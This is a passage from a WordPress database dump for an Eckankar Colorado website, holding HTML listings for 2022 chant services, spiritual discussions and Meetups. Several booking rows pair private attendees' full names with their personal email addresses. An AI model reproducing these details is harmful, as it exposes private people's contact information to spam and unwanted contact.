rel=\"noopener\">HERE</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/287475047\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-2','','','2022-07-28 17:10:02','2022-07-28 23:10:02','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266988',0,'mec-events','',0),(266990,15,'2022-07-29 16:15:20','2022-07-29 22:15:20','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Experience The Sound of Soul--HU, Sacred Sound, Ancient Mantra</span></p>\r\n<ul class=\"\" style=\"list-style-type: disc;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Discover Your Inner Guidance</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing for Body, Mind and Spirit</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">A Higher Form of Creativity</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Experience HU--The Sound of Soul Events offer the opportunity to chant HU, a love song to God; engage in spiritual conversation; and enjoy community. Meet others of like heart who share a desire to explore their own connection with God or Divine Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Overview of an Experience the Sound of Soul event:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• There will be a warm introduction.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• The facilitator will read an inspiring quote.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• We will chant HU with love for about 15 - 20 minutes (pronounced like the word hue.)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• There will be a quiet contemplation time of about 3 to 5 minutes.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• Finally, you\'ll have the opportunity for spiritual conversation in a welcoming and respectful atmosphere to explore your own connection with God or Divine Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We hope that you will join us for this uplifting event that is sponsored by ECKANKAR, the Path of Spiritual Freedom. It is open to anyone of any religion, culture or walk of life. For more info on the HU, go to:&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">HU Sacred Sound Ancient Mantra</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Bring a chair or blanket to sit on.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/287175882/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Boulder County guidelines for all in person outdoor events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Boulder<br>Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-3','','','2022-08-16 12:48:28','2022-08-16 18:48:28','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266990',0,'mec-events','',0),(266991,0,'2022-07-31 13:21:50','2022-07-31 19:21:50','','','','publish','closed','closed','','266991','','','2022-07-31 13:21:50','2022-07-31 19:21:50','',0,'https://eckankar-colorado.org/nf_sub/266991/',0,'nf_sub','',0),(266992,1000036,'2022-09-18 11:45:00','2022-09-18 17:45:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net-6','','','2022-09-18 11:45:00','2022-09-18 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266992',0,'mec-books','',0),(266994,15,'2022-08-01 17:14:07','2022-08-01 23:14:07','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Did you know divine help is as close as your heartbeat?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like answers on how to better navigate your days?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you looking for confidence in your own spiritual compass?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you hear the whispers of Spirit?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Discover how listening to your inner guidance can help you with all of these! Tune into the gifts of intuition, dreams, nudges, and signs to help guide you in your daily life. Spirit is always with us—always guiding, always protecting, always bringing joy and wisdom.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says “Spirit is always with us, always guiding, always protecting, always attempting to bring joy and make our life better, but that doesn’t mean we are always aware and listening.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss the many benefits of listening to your own inner guidance and explore techniques to help you tune into it and the divine protection that is your birthright. Our goal is that each person will understand that divine guidance and protection is always there.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/287546728/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'12 Gifts of Spiritual Living: Inner Guidance and Spiritual Protection\'','','publish','closed','closed','','meetup-online12-gifts-of-spiritual-living-inner-guidance-and-spiritual-protection','','','2022-08-01 17:14:07','2022-08-01 23:14:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266994',0,'mec-events','',0),(266995,15,'2022-08-01 17:10:42','2022-08-01 23:10:42','','GoldenHeart','','inherit','closed','closed','','goldenheart','','','2022-08-01 17:10:42','2022-08-01 23:10:42','',266994,'https://eckankar-colorado.org/wp-content/uploads/2022/08/GoldenHeart.webp',0,'attachment','image/webp',0),(266996,15,'2022-08-01 17:22:46','2022-08-01 23:22:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you wonder what\'s next when our physical body dies?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you curious about loved ones who have already passed on?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to visit the inner heavens while you are still alive?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event will help you gain new perspectives on</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">seeing heaven before you die</span></li>\r\n	<li><span style=\"font-size: 14pt;\">meeting with departed loved ones</span></li>\r\n	<li><span style=\"font-size: 14pt;\">near-death experiences</span></li>\r\n	<li><span style=\"font-size: 14pt;\">help from spiritual guides</span></li>\r\n	<li><span style=\"font-size: 14pt;\">and dealing with grief</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;Please RSVP to get the Zoom link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>\'Life and Love After Death\'','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinelife-and-love-after-death','','','2022-08-01 17:22:46','2022-08-01 23:22:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266996',0,'mec-events','',0),(266997,15,'2022-08-01 17:20:40','2022-08-01 23:20:40','','Bridge','','inherit','closed','closed','','bridge','','','2022-08-01 17:20:40','2022-08-01 23:20:40','',266996,'https://eckankar-colorado.org/wp-content/uploads/2022/08/Bridge.webp',0,'attachment','image/webp',0),(266998,15,'2022-08-02 07:17:44','2022-08-02 13:17:44','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound, and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this IN-PERSON event in Pagosa Springs, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion group, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/287549775/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Archuleta County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-4','','','2022-08-02 07:17:44','2022-08-02 13:17:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266998',0,'mec-events','',0),(267012,2,'2022-09-06 17:10:30','0000-00-00 00:00:00','<div class=\"tmpl-blog-5 boldgrid-section dynamic-gridblock\" style=\"background-color: #ebf4ff;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 3px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-6 col-lg-6\">\r\n<p class=\"mod-reset\" style=\"margin-top: 24px;\"><img class=\"bg-img bg-img-rounded-bottom-left bg-img-rounded-top-right alignright wp-image-267018 size-full\" style=\"box-shadow: #cccccc -8px 10px 6px 3px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/07/2022-satsang-promo-bk-3.jpg\" alt=\"\" width=\"540\" height=\"360\"></p>\r\n</div>\r\n<div class=\"col-md-6 col-sm-12 col-xs-12 col-lg-6\">\r\n<div class=\"bg-box\">\r\n<h2 class=\"h1\" style=\"font-size: 42px; text-transform: capitalize; font-family: PT Sans Caption; font-weight: 400; color: #1e63bc;\" data-font-family=\"PT Sans Caption\" data-font-weight=\"400\" data-font-style=\"\">2022-2023<br>\r\nMember Satsang Classes</h2>\r\n<p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 34px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Now Open For Registration</p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div>\r\n<hr class=\"bg-hr color3-color\" style=\"border: 2px solid; margin-bottom: 13px; margin-left: 0px; margin-top: 0px; width: 32%;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"color3-color\" style=\"font-size: 18px;\">An ECK Satsang class is a gathering of ECK members who choose to come together once or twice a month to further their spiritual understanding through study of the ECK discourses.</p>\r\n<p class=\"\"><a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2022-2023/\">Register Today!</a></p>\r\n</div>\r\n</div>\r\n<p class=\"\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>','2022-2023-SATSANG REGISTRATION PROMO-- For MEMBER PAGE','','draft','closed','closed','','','','','2022-09-06 17:10:30','2022-09-06 23:10:30','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=267012',0,'bg_block','',0),(267018,2,'2022-08-10 09:58:06','2022-08-10 15:58:06','','2022-satsang-promo-bk-3','','inherit','closed','closed','','2022-satsang-promo-bk-3','','','2022-08-10 09:58:06','2022-08-10 15:58:06','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/07/2022-satsang-promo-bk-3.jpg',0,'attachment','image/jpeg',0),(267021,0,'2022-08-11 01:03:20','2022-08-11 07:03:20','','','','publish','closed','closed','','267021','','','2022-08-11 01:03:20','2022-08-11 07:03:20','',0,'https://eckankar-colorado.org/nf_sub/267021/',0,'nf_sub','',0),(267025,1000039,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Nancy - n.condon@yahoo.com','','publish','closed','closed','','nancy-n-condonyahoo-com','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267025',0,'mec-books','',0),(267026,1000023,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-5','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267026',0,'mec-books','',0),(267027,1000022,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-4','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267027',0,'mec-books','',0),(267028,1000040,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Darlene Reed - darlenerreed@comcast.net','','publish','closed','closed','','darlene-reed-darlenerreedcomcast-net','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267028',0,'mec-books','',0),(267029,1000024,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Roger Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net-3','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267029',0,'mec-books','',0),(267030,1000041,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Russell Reed - russellvreed@comcast.net','','publish','closed','closed','','russell-reed-russellvreedcomcast-net','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267030',0,'mec-books','',0),(267031,1000042,'2022-08-14 10:30:00','2022-08-14 16:30:00','','Lisa-Marie Rousseau - lmrousseau@gmail.com','','publish','closed','closed','','lisa-marie-rousseau-lmrousseaugmail-com','','','2022-08-14 10:30:00','2022-08-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267031',0,'mec-books','',0),(267035,0,'2022-08-15 20:41:31','2022-08-16 02:41:31','','','','publish','closed','closed','','267035','','','2022-08-15 20:41:31','2022-08-16 02:41:31','',0,'https://eckankar-colorado.org/nf_sub/267035/',0,'nf_sub','',0),(267036,0,'2022-08-16 05:27:27','2022-08-16 11:27:27','','','','publish','closed','closed','','267036','','','2022-08-16 05:27:27','2022-08-16 11:27:27','',0,'https://eckankar-colorado.org/nf_sub/267036/',0,'nf_sub','',0),(267037,2,'2022-08-16 12:36:48','2022-08-16 18:36:48','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in. </span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em> </span></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'What are Life\'s Best Teachers?\'','','publish','closed','closed','','roundtable-discussion-in-personwhat-are-lifes-best-teachers','','','2022-08-16 12:52:48','2022-08-16 18:52:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267037',0,'mec-events','',0),(267038,2,'2022-08-16 12:35:37','2022-08-16 18:35:37','','hummingbird-flower-1','','inherit','closed','closed','','hummingbird-flower-1','','','2022-08-16 12:35:37','2022-08-16 18:35:37','',267037,'https://eckankar-colorado.org/wp-content/uploads/2022/08/hummingbird-flower-1.jpg',0,'attachment','image/jpeg',0),(267041,15,'2022-08-18 20:43:12','2022-08-19 02:43:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">www.TheSoundofSoul.org</a>.</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience The Sound of Soul: HU - Online','','publish','closed','closed','','experience-the-sound-of-soul-hu-online','','','2022-08-18 20:43:12','2022-08-19 02:43:12','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267041',0,'mec-events','',0),(267043,15,'2022-08-18 20:51:04','2022-08-19 02:51:04','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you ever wonder if you’ve had a past life with a loved one?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you wish you could change some of the relationship patterns in your family?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember past lives?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you’re ready to explore the past and see what lessons it holds for you and your family today, then this Meetup is for you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the first in a series of three spiritual discussions especially for families. You are welcome to attend one or all.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You have lived before. Lessons from past lives helped you get to where you are today. Your family, your coworkers, your virtues, and shortcomings all have roots in distant lives. Unlocking memories and lessons can help you sort through problems, grow your relationships, and move forward in life with more love and confidence.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp states in his book, <em>A Modern Prophet Answers Your Key Questions About Life</em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“No matter what we were in the past during any life, we are spiritually greater today.<em>”</em></span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Some of the topics we will explore in this discussion are:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">How karma and reincarnation affect our relationships</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Techniques for remembering past lives</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual freedom—ways to work out our karma</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We’ll also share a couple of spiritual exercises you can use to live a happier, more fulfilling life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next two discussions are&nbsp;<em>Spiritual Tools and Techniques to Nurture Your Family Relationships</em>&nbsp;to be held on Saturday, October 29 and&nbsp;<em>Creative Ways to Grow Spiritually While Serving Your Family</em>&nbsp;to be held on Saturday, November 19.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection, check out&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>. You can also explore our Parents and Families resources at&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/explore/parents-families/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Programs for Youth, Parents &amp; Families | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/287883371/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'How Past Lives Affect Our Relationships Today\'','','publish','closed','closed','','meetup-onlinehow-past-lives-affect-our-relationships-today','','','2022-08-18 20:51:04','2022-08-19 02:51:04','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267043',0,'mec-events','',0),(267044,15,'2022-08-18 21:01:54','2022-08-19 03:01:54','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 15pt;\">Do you know how to learn from your mistakes and move on?</span></strong><br>\r\n<strong><span style=\"font-size: 15pt;\">Are you looking for greater happiness in all of your relationships?</span></strong><br>\r\n<strong><span style=\"font-size: 15pt;\">Do you want to love yourself and others more?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, this event will help you gain new perspectives on:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">the secret of all relationships</span></li>\r\n	<li><span style=\"font-size: 14pt;\">learning from our own mistakes</span></li>\r\n	<li><span style=\"font-size: 14pt;\">how to love yourself</span></li>\r\n	<li><span style=\"font-size: 14pt;\">your bond of love with all life and with God</span></li>\r\n</ul>\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #23507d; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Life is a stream of happy and unhappy experiences, because that leads to Soul’s purification. How do you get by in dark times? Try to give love to someone, especially then.”</span><br>\r\n<span style=\"font-size: 12pt; color: #666666;\"><span style=\"font-size: 13pt;\">— <a href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Harold Klemp</a>, the Mahanta, the Living ECK Master and spiritual leader of Eckankar</span><br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;Please RSVP to get the Zoom link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Light and Sound Service - In Person & Online<br>\'Life\'s Best Teachers\'','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinelifes-best-teachers','','','2022-08-24 10:30:21','2022-08-24 16:30:21','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267044',0,'mec-events','',0),(267045,15,'2022-08-18 20:58:16','2022-08-19 02:58:16','','BeachSunset','','inherit','closed','closed','','beachsunset','','','2022-08-18 20:58:16','2022-08-19 02:58:16','',267044,'https://eckankar-colorado.org/wp-content/uploads/2022/08/BeachSunset.webp',0,'attachment','image/webp',0),(267047,1000043,'2022-08-21 11:45:00','2022-08-21 17:45:00','','Gordon garland - huusinger@comcast.net','','publish','closed','closed','','gordon-garland-huusingercomcast-net','','','2022-08-21 11:45:00','2022-08-21 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267047',0,'mec-books','',0),(267048,1000044,'2022-08-21 